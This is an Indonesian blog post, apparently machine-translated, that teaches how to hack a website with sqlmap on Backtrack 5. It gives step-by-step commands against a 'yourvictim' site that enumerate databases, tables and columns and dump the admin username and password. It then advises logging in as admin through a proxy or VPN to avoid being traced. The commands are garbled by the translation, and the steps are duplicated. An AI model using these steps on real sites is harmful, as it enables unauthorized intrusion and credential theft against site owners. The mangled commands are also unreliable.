Dalam tutorial sebelumnya saya
telah menjelaskan apa yang mundur , sekarang dalam tutorial ini saya
akan menunjukkan kepada Anda cara hack website menggunakan Backtrack 5 (sqlmap). Sqlmap adalah sql injection otomatis alat yang membantu Anda untuk hack situs dengan mudah. Ikuti langkah-langkah sederhana untuk hack website menggunakan backtrack 5 alat sqlmap.
1. Buka terminal mundur dan jenis cd / pentest / database / sqlmap dan tekan enter. Sekarang sqlmap terbuka di terminal Anda
2. Sekarang menemukan situs rentan. (Baik saya sudah memiliki situs rentan)
3. Sekarang ketik perintah ini di terminal dan tekan enter. (Lihat di atas gambar)
4. Sekarang Anda akan mendapatkan nama database website
Yah aku punya dua database aj dan information_schema kita akan memilih database aj.
5. Sekarang mendapatkan tabel database tersebut. untuk itu Anda perlu memasukkan perintah ini ke terminal Anda dan hanya tekan Enter.
6. Sekarang kita perlu untuk mengambil tabel dari database aj. paste perintah bawah perintah dan tekan enter.
7. Sekarang Anda akan mendapatkan daftar tabel yang disimpan dalam database aj.
8. Sekarang mari kita ambil kolom dari tabel admin
Sekarang kita punya kolom dan kami mendapat username dan password
9. Sekarang mari kita ambil password admin
Sekarang hanya menemukan admin pidana website dan menggunakan proxy / vpn ketika Anda mencoba untuk login di website sebagai admin. Salam Luar Biasa
1. Buka terminal mundur dan jenis cd / pentest / database / sqlmap dan tekan enter. Sekarang sqlmap terbuka di terminal Anda
2. Sekarang menemukan situs rentan. (Baik saya sudah memiliki situs rentan)
3. Sekarang ketik perintah ini di terminal dan tekan enter. (Lihat di atas gambar)
python sqlmap.py-u http://yourvictim 'menyelinap / index.php id =? 4 -dbs
4. Sekarang Anda akan mendapatkan nama database website
Yah aku punya dua database aj dan information_schema kita akan memilih database aj.
5. Sekarang mendapatkan tabel database tersebut. untuk itu Anda perlu memasukkan perintah ini ke terminal Anda dan hanya tekan Enter.
python sqlmap.py-u slink / index.php http://yourvictim '? id = 4 -D (nama database)-tabel
6. Sekarang kita perlu untuk mengambil tabel dari database aj. paste perintah bawah perintah dan tekan enter.
python sqlmap.py-u http://www.yourvictim 'slink.com / index.php id =? 4 -D aj-tabel
7. Sekarang Anda akan mendapatkan daftar tabel yang disimpan dalam database aj.
8. Sekarang mari kita ambil kolom dari tabel admin
python sqlmap.py-u http://www.yourvictim 'slink.com / index.php id = 4? -T admin - kolom
Sekarang kita punya kolom dan kami mendapat username dan password
9. Sekarang mari kita ambil password admin
python sqlmap.py-u ? slink.com / index.php http://www.yourvictim 'id = 4 -T admin-U test - dumpSekarang kita punya username dan password dari website!
Sekarang hanya menemukan admin pidana website dan menggunakan proxy / vpn ketika Anda mencoba untuk login di website sebagai admin. Salam Luar Biasa
0 komentar:
Posting Komentar
Silahkan Berkomentar Dengan Baik
Catatan: Hanya anggota dari blog ini yang dapat mengirim komentar.